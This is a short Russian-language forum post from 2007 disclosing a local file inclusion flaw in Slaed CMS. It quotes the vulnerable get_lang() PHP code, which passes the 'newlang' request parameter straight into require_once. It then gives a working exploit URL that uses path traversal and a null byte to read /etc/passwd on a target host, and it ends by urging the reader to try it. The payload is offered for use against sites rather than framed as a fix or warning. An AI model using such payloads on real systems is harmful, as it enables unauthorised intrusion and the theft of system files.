11.11.2007, 13:12
|
|
Участник форума
Регистрация: 19.05.2007
Сообщений: 228
Провел на форуме:
4325663
Репутация:
240
|
|
Скачал последнюю версию с оффсайта Slaed CMS. Кинулся в глаза код в файле function/sources.php:
PHP код:
function get_lang($module="") {
global $multilingual, $currentlang, $language, $user_cookie_t;
if (isset($_REQUEST['newlang']) && $multilingual == "1") {
if (file_exists("language/lang-".$_REQUEST['newlang'].".php")) {
setcookie("lang", $_REQUEST['newlang'], time() + intval($user_cookie_t));
require_once("language/lang-".$_REQUEST['newlang'].".php");
Вызов функции get_lang идет в файле index.php,
PHP код:
require_once("function/function.php");
get_lang();
Поетому, при magic_quotes_gpc = off есть возможность заюзать локальный инклуд
Код:
http://[targethost]/index.php?newlang=../../../../../../../../../../etc/passwd%00
Попробуй, может поможет. |
|
|